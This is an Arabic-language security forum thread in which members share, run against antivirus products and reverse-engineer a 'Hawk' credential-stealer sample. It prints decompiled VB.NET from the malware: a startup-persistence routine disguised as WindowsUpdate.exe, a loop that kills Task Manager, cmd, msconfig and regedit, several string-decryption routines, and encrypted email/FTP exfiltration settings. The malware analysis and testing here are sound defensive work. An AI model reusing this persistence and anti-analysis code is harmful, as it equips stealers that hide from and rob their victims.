تشفيرة Stealer ستيلر رهيييب جدا وقوي وممتع للتشغيل والفك اليدوي (ليس للفحص أوكي!)

[MagicianMiDo32]

:: بسم الرحمـن الرحيم::

::السلام عليكم ورحمة الله وبركاته ::

اليوم معي ملف قوي جدا أحضرته من عينة أخونا @mohamed gouch

المصدر: 12-09-2015#14
في منتدى : منتدى نقاشات واختبارات برامج الحماية

الملف عبارة عن ستيلر أسمه Hawk أو الصقر

ما أعجبني في الملف انه غير كل الملفات التقليدية

فهو لايعتمد على الحماية القوية فقط بل أن السورس ملعوب فيه جامد وفيه دوال وخوارزميات للتمويه وكأنه ملف مسابقة طرحته أحدى المنتديات

وكذلك فهو من نوع جديد وفريد

فكلنا أعتدنا على سيرفر النجرات وإيجاد الهوست والبورت لكن هذة المرة المطلوب منا إيجاد الإيميل والباسوورد الذين يرسل الملف بياناته باستخدامهما


وهما مشفران وتوجد أكثر من خوارزمية فك تشفير

وكلنا إعتدنا على أساليب العرب الرتيبة في التشفير
كله Installer أنستالير أنستالير حماية حماية
لكن إبداع في سورس الملف كلا
قلد فقط لا تبدع حتى لاتخطئ

لكن هذا الملف فيه تقنيات جديدة ومثيرة ستعجب الفاحصين كثيرا
وحتى نرى كيف يشفر الأجانب ومن الأفضل

الملف كذلك سيعجب الأخوة الذين سيشغلون كثيرا

فهو فضلا عن قيامه بإضافة نفسه في بدء التشغيل ونسخ نفسه لمجلد التيمب, فهو يقوم بأيقاف التاسك مانيجر والـ CMD
كذلك فهو يقوم بوضع هوك على لوحة المفاتيح والمتصفحات

ويكون محلل السلوك ناجحا إذا إكتشف هذة السلوكيات

::التحميل::
[hide]


infected

[/hide]


ود,

 

[nasa3]

مشاهدة المرفق 97625
مشاهدة المرفق 97623
مشاهدة المرفق 97622

:: بسم الرحمـن الرحيم::

::السلام عليكم ورحمة الله وبركاته ::
مشاهدة المرفق 97623

اليوم معي ملف قوي جدا أحضرته من عينة أخونا @mohamed gouch

المصدر: 12-09-2015#14
في منتدى : منتدى نقاشات واختبارات برامج الحماية

الملف عبارة عن ستيلر أسمه Hawk أو الصقر

ما أعجبني في الملف انه غير كل الملفات التقليدية

فهو لايعتمد على الحماية القوية فقط بل أن السورس ملعوب فيه جامد وفيه دوال وخوارزميات للتمويه وكأنه ملف مسابقة طرحته أحدى المنتديات

وكذلك فهو من نوع جديد وفريد

فكلنا أعتدنا على سيرفر النجرات وإيجاد الهوست والبورت لكن هذة المرة المطلوب منا إيجاد الإيميل والباسوورد الذين يرسل الملف بياناته باستخدامهما


وهما مشفران وتوجد أكثر من خوارزمية فك تشفير

وكلنا إعتدنا على أساليب العرب الرتيبة في التشفير
كله Installer أنستالير أنستالير حماية حماية
لكن إبداع في سورس الملف كلا
قلد فقط لا تبدع حتى لاتخطئ

لكن هذا الملف فيه تقنيات جديدة ومثيرة ستعجب الفاحصين كثيرا
وحتى نرى كيف يشفر الأجانب ومن الأفضل

الملف كذلك سيعجب الأخوة الذين سيشغلون كثيرا

فهو فضلا عن قيامه بإضافة نفسه في بدء التشغيل ونسخ نفسه لمجلد التيمب, فهو يقوم بأيقاف التاسك مانيجر والـ CMD
كذلك فهو يقوم بوضع هوك على لوحة المفاتيح والمتصفحات

ويكون محلل السلوك ناجحا إذا إكتشف هذة السلوكيات

مشاهدة المرفق 97623

::التحميل::
[hide]
مشاهدة المرفق 97624

infected

[/hide]

ود,
مشاهدة المرفق 97622

انت تريد نظام وهمى للتشغيل ​

 

[MagicianMiDo32]

انت تريد نظام وهمى للتشغيل ​

شادو ديفندر يكفي

 

[nasa3]

شادو ديفندر يكفي

لا يا باشا اذا كان شغل اجانب نقلق شادو لا ينفع معهم ​

 

[MagicianMiDo32]

لا يا باشا اذا كان شغل اجانب نقلق شادو لا ينفع معهم ​

لا تقلق

فحصته

لايوجد تخطي

فقط يعطل التاسك مانيجر والـ CMD

وبعدين ما كل المواقع الأجنبية بتحط عينات أجنبية
وكله بيشغلها عادي

 

[النــاريــ]

متابع ابداع الاخوة بصمت

 

[MagicianMiDo32]

بقي فقط فك الخوارزمية والحصول على الأيميل لكن ,

هناك ملف مشفر في الريسورس

وكذلك مكتبة محمية بشكل قوي تثير الريبة

 

[MagicianMiDo32]

النصوص المشفرة​

[hide][hide]




[/hide]

    Me.encryptedemailstring = "JAWbv2QwVyQ71dGhWCP7qFtG3Z0QJJh3EzhvlH9x0LycEn35+RNpK0CYr8sErnkTIr243LC1V5XVP6sEcAbTFQ=="
    Me.encryptedpassstring = "bn0Kaw0wKAz1Cbzr5YTAEd99kmE5mb1PMi7aQ5PHyqM="
    Me.encryptedsmtpstring = "ijq0zFY/y2Yk5eApxMDoG9bJJx17AQQL2rNO9sKeQyHvYbBmon3+yQZeVqnQQnJO"
    Me.portstring = "587"
    Me.timerstring = "1200000"
    Me.fakemgrstring = ""
    Me.encryptedftphost = "DAsaMA1AiWAMiX7/2niNpvJ+E0CcAZ0/P/PUZITbhX0UWQ8oMH0QOkPNxtwLtBAs"
    Me.encryptedftpuser = "wY0LEe9y+2yGXhDXmfDrHo+J8EmuP1ocrF5FrTuC1PY="
    Me.encryptedftppass = "3/BxGIs7loR7FQ9LFgYmxASj436ZcTD4lx8u+gtq6ug="
    Me.encryptedphplink = "PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=="

[/hide]
​

إضافة ستارت أب
​

[hide]

<MethodImpl(MethodImplOptions.NoOptimization)> _
Public Sub addtostartup()
    If Not File.Exists((Environment.GetFolderPath(SpecialFolder.ApplicationData) & "\WindowsUpdate.exe")) Then
        FileSystem.FileCopy(Application.ExecutablePath, (Environment.GetFolderPath(SpecialFolder.ApplicationData) & "\WindowsUpdate.exe"))
        Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True).SetValue("Windows Update", (Environment.GetFolderPath(SpecialFolder.ApplicationData) & "\WindowsUpdate.exe"), RegistryValueKind.String)
    End If
End Sub

[/hide]​

 

[MagicianMiDo32]

دالة الفك الأولى

[hide]

Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
    Dim str As String
    Dim managed As New RijndaelManaged
    Dim provider As New MD5CryptoServiceProvider
    Try
        Dim destinationArray As Byte() = New Byte(&H20  - 1) {}
        Dim sourceArray As Byte() = provider.ComputeHash(Encoding.ASCII.GetBytes(pass))
        Array.Copy(sourceArray, 0, destinationArray, 0, &H10)
        Array.Copy(sourceArray, 0, destinationArray, 15, &H10)
        managed.Key = destinationArray
        managed.Mode = CipherMode.ECB
        Dim transform As ICryptoTransform = managed.CreateDecryptor
        Dim inputBuffer As Byte() = Convert.FromBase64String(input)
        str = Encoding.ASCII.GetString(transform.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length))
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
        ProjectData.ClearProjectError
    End Try
    Return str
End Function

[/hide]





الثانية


[hide]

Public Function DecompressString(ByVal compressedText As String) As String
    Try
        Dim buffer As Byte() = Convert.FromBase64String(compressedText)
        Using stream As MemoryStream = New MemoryStream
            Dim num As Integer = BitConverter.ToInt32(buffer, 0)
            stream.Write(buffer, 4, (buffer.Length - 4))
            Dim array As Byte() = New Byte(((num - 1) + 1)  - 1) {}
            stream.Position = 0
            Using stream2 As GZipStream = New GZipStream(stream, CompressionMode.Decompress)
                stream2.Read(array, 0, array.Length)
            End Using
            Return Encoding.UTF8.GetString(array)
        End Using
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
        ProjectData.ClearProjectError
    End Try
    Return Nothing
End Function

[/hide]





الثالثة





[hide]

[/hide]​

[hide]

Public Function Decrypt(ByVal encryptedBytes As String, ByVal secretKey As String) As String
    Dim str2 As String = Nothing
    Using stream As MemoryStream = New MemoryStream(Convert.FromBase64String(encryptedBytes))
        Dim managed As RijndaelManaged = Me.getAlgorithm(secretKey)
        Using stream2 As CryptoStream = New CryptoStream(stream, managed.CreateDecryptor, CryptoStreamMode.Read)
            Dim buffer As Byte() = New Byte((CInt((stream.Length - 1)) + 1)  - 1) {}
            Dim count As Integer = stream2.Read(buffer, 0, CInt(stream.Length))
            str2 = Encoding.Unicode.GetString(buffer, 0, count)
        End Using
    End Using
    Return str2
End Function

​

[/hide]

دالة تابعة لها


[hide]
[/hide]​

[hide]

Private Function getAlgorithm(ByVal secretKey As String) As RijndaelManaged
    Dim bytes As New Rfc2898DeriveBytes(secretKey, Encoding.Unicode.GetBytes("099u787978786"))
    Dim managed As New RijndaelManaged
    managed.KeySize = &H100
    managed.IV = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.BlockSize) / 8)))))
    managed.Key = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.KeySize) / 8)))))
    managed.Padding = PaddingMode.PKCS7
    Return managed
End Function

[/hide]

الرابعة



[hide]

Public Function DES_Decrypt(ByVal input As String, ByVal pass As String) As String
    Dim str2 As String
    Dim provider As New DESCryptoServiceProvider
    Dim provider2 As New MD5CryptoServiceProvider
    Try
        Dim destinationArray As Byte() = New Byte(8  - 1) {}
        Array.Copy(provider2.ComputeHash(Encoding.Unicode.GetBytes(pass)), 0, destinationArray, 0, 8)
        provider.Key = destinationArray
        provider.Mode = CipherMode.ECB
        Dim transform As ICryptoTransform = provider.CreateDecryptor
        Dim inputBuffer As Byte() = Convert.FromBase64String(input)
        str2 = Encoding.Unicode.GetString(transform.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length))
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
        ProjectData.ClearProjectError
    End Try
    Return str2
End Function

[/hide]




تعطيل التاسك مانيجر


[hide]


[/hide]​

[hide]
Public Sub Disabler()
Do While True
If (Me.TaskManager <> "DisableTaskManager") Then
Dim process As Process
For Each process In Process.GetProcesses
If (process.ProcessName = "Taskmgr") Then
process.Kill
End If
Next
End If
If (Me.TaskManager <> "DisableTaskManager") Then
Dim process2 As Process
For Each process2 In Process.GetProcesses
If (process2.ProcessName = "taskmgr") Then
process2.Kill
End If
Next
End If
If (Me.cmd <> "Disablecmd") Then
Dim process3 As Process
For Each process3 In Process.GetProcesses
If (process3.ProcessName = "cmd") Then
process3.Kill
End If
Next
End If
If (Me.misconfig <> "Disablemsconfig") Then
Dim process4 As Process
For Each process4 In Process.GetProcesses
If (process4.ProcessName = "msconfig") Then
process4.Kill
End If
Next
End If
If (Me.reg <> "Disablereg") Then
Dim process5 As Process
For Each process5 In Process.GetProcesses
If (process5.ProcessName = "regedit") Then
process5.Kill
End If
Next
End If
If (Me.startup <> "Disablestartup") Then
Me.addtostartup
End If
Thread.Sleep(200)
Loop
End Sub

[/hide]

​

 

[Mr. Abdul Bari]

جاري التجريب على البرنامج المعروف

bitdefinder 2016 بأقصى الاعدادات

 

[black007]

ملف ممتاز

الملف مصمم لكى يتم التبليغ على وضعين مختلفه

الاولى عبر الايميل

الثانى عبر FTP

بالنسبه الى الفنكشنات الموضوع فكل فانكشن هو مسئول عن تشفير جزئيه معنيه داخل السورس

الصراحه المبرمج مخادع واضع فنكشنات كثيره للتمويه

الفانكشن الحقيقى المسؤل عن فك تشفير هو

[hide]

Public Function Decrypt(ByVal encryptedBytes As String, ByVal secretKey As String) As String
    Dim str2 As String = Nothing
    Using stream As MemoryStream = New MemoryStream(Convert.FromBase64String(encryptedBytes))
        Dim managed As RijndaelManaged = Me.getAlgorithm(secretKey)
        Using stream2 As CryptoStream = New CryptoStream(stream, managed.CreateDecryptor, CryptoStreamMode.Read)
            Dim buffer As Byte() = New Byte((CInt((stream.Length - 1)) + 1)  - 1) {}
            Dim count As Integer = stream2.Read(buffer, 0, CInt(stream.Length))
            str2 = Encoding.Unicode.GetString(buffer, 0, count)
        End Using
    End Using
    Return str2
End Function

Private Function getAlgorithm(ByVal secretKey As String) As RijndaelManaged
    Dim bytes As New Rfc2898DeriveBytes(secretKey, Encoding.Unicode.GetBytes("099u787978786"))
    Dim managed As New RijndaelManaged
    managed.KeySize = &H100
    managed.IV = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.BlockSize) / 8)))))
    managed.Key = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.KeySize) / 8)))))
    managed.Padding = PaddingMode.PKCS7
    Return managed
End Function

[/hide]

النتيجه النهائيه لجميع الاسترنج المشفر

[hide]

[/hide]

وملف ممتاز ياميدو

(Good Hunter (MagicianMiDo32

 

[SkY MaRvEL]

شادو ديفيندر فيه مشاكل مع الويندوز 10 للأسف
لا اقدر ان اجرب
واضح الستيلر قوي جدا

 

[MagicianMiDo32]

ملف ممتاز

الملف مصمم لكى يتم التبليغ على وضعين مختلفه

الاولى عبر الايميل

الثانى عبر FTP

بالنسبه الى الفنكشنات الموضوع فكل فانكشن هو مسئول عن تشفير جزئيه معنيه داخل السورس

الصراحه المبرمج مخادع واضع فنكشنات كثيره للتمويه

الفانكشن الحقيقى المسؤل عن فك تشفير هو

[hide]

Public Function Decrypt(ByVal encryptedBytes As String, ByVal secretKey As String) As String
    Dim str2 As String = Nothing
    Using stream As MemoryStream = New MemoryStream(Convert.FromBase64String(encryptedBytes))
        Dim managed As RijndaelManaged = Me.getAlgorithm(secretKey)
        Using stream2 As CryptoStream = New CryptoStream(stream, managed.CreateDecryptor, CryptoStreamMode.Read)
            Dim buffer As Byte() = New Byte((CInt((stream.Length - 1)) + 1)  - 1) {}
            Dim count As Integer = stream2.Read(buffer, 0, CInt(stream.Length))
            str2 = Encoding.Unicode.GetString(buffer, 0, count)
        End Using
    End Using
    Return str2
End Function

Private Function getAlgorithm(ByVal secretKey As String) As RijndaelManaged
    Dim bytes As New Rfc2898DeriveBytes(secretKey, Encoding.Unicode.GetBytes("099u787978786"))
    Dim managed As New RijndaelManaged
    managed.KeySize = &H100
    managed.IV = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.BlockSize) / 8)))))
    managed.Key = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.KeySize) / 8)))))
    managed.Padding = PaddingMode.PKCS7
    Return managed
End Function

[/hide]

النتيجه النهائيه لجميع الاسترنج المشفر

[hide]

[/hide]

وملف ممتاز ياميدو

(Good Hunter (MagicianMiDo32

عجبني بصراحة

فضلت سهران عليه أمبارح لحد الساعة 3 الفجر علشان أفكه
وكان عليا أمتحان أمبارح فاضريت أصحى الساعة 9 علشان أذاكر

ضيعت وقتي
اتلاخمت مع الملف

 

[kimo7]

التشغيل على البولجارد محلل سلوك النوفا شيلد يقتله بالتنبيه
[hide]

[/hide]
[hide]

[/hide]

 

[MagicianMiDo32]

ملف ممتاز

الملف مصمم لكى يتم التبليغ على وضعين مختلفه

الاولى عبر الايميل

الثانى عبر FTP

بالنسبه الى الفنكشنات الموضوع فكل فانكشن هو مسئول عن تشفير جزئيه معنيه داخل السورس

الصراحه المبرمج مخادع واضع فنكشنات كثيره للتمويه

الفانكشن الحقيقى المسؤل عن فك تشفير هو

[hide]

Public Function Decrypt(ByVal encryptedBytes As String, ByVal secretKey As String) As String
    Dim str2 As String = Nothing
    Using stream As MemoryStream = New MemoryStream(Convert.FromBase64String(encryptedBytes))
        Dim managed As RijndaelManaged = Me.getAlgorithm(secretKey)
        Using stream2 As CryptoStream = New CryptoStream(stream, managed.CreateDecryptor, CryptoStreamMode.Read)
            Dim buffer As Byte() = New Byte((CInt((stream.Length - 1)) + 1)  - 1) {}
            Dim count As Integer = stream2.Read(buffer, 0, CInt(stream.Length))
            str2 = Encoding.Unicode.GetString(buffer, 0, count)
        End Using
    End Using
    Return str2
End Function

Private Function getAlgorithm(ByVal secretKey As String) As RijndaelManaged
    Dim bytes As New Rfc2898DeriveBytes(secretKey, Encoding.Unicode.GetBytes("099u787978786"))
    Dim managed As New RijndaelManaged
    managed.KeySize = &H100
    managed.IV = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.BlockSize) / 8)))))
    managed.Key = bytes.GetBytes(CInt(Math.Round(CDbl((CDbl(managed.KeySize) / 8)))))
    managed.Padding = PaddingMode.PKCS7
    Return managed
End Function

[/hide]

النتيجه النهائيه لجميع الاسترنج المشفر

[hide]

[/hide]

وملف ممتاز ياميدو

(Good Hunter (MagicianMiDo32

بس أيه حكاية المكتبة المشفرة دي يا صاحبي .؟
الملفين الي في الريسورس مكتبة تبع ال run pe

وواحدة تانية مشفرة معرفتش أفكها

 

[COMANDOS]

[hide]انتو بتقولو كلام زلفل [/hide]

 

[أبو رمش]

الملف مكشوف بالفحص من البتد فيندر ! تم إغلاق الحماية الاستباقية و تشغيل الملف و السماح لكل الرسائل لكن محلل السلوك وقف له بالمرصاد و قام بقتله و حذفه و حذف كل ما ارتبط به ...

 

[MagicianMiDo32]

[hide]انتو بتقولو كلام زلفل [/hide]

تسلم ياسطى

 

[ذي يزن]

النود 8 بمجرد فك الضغط لم ينتظر ...اعتذر عن تشغيل الملف لانه لايوجد لدي نظام وهمي

 

[أحمد البدارنة]

https://valkyrie.comodo.com/get_info?sha1=7645f4bfc97ae82f6cba6e041fa5566389ad09c5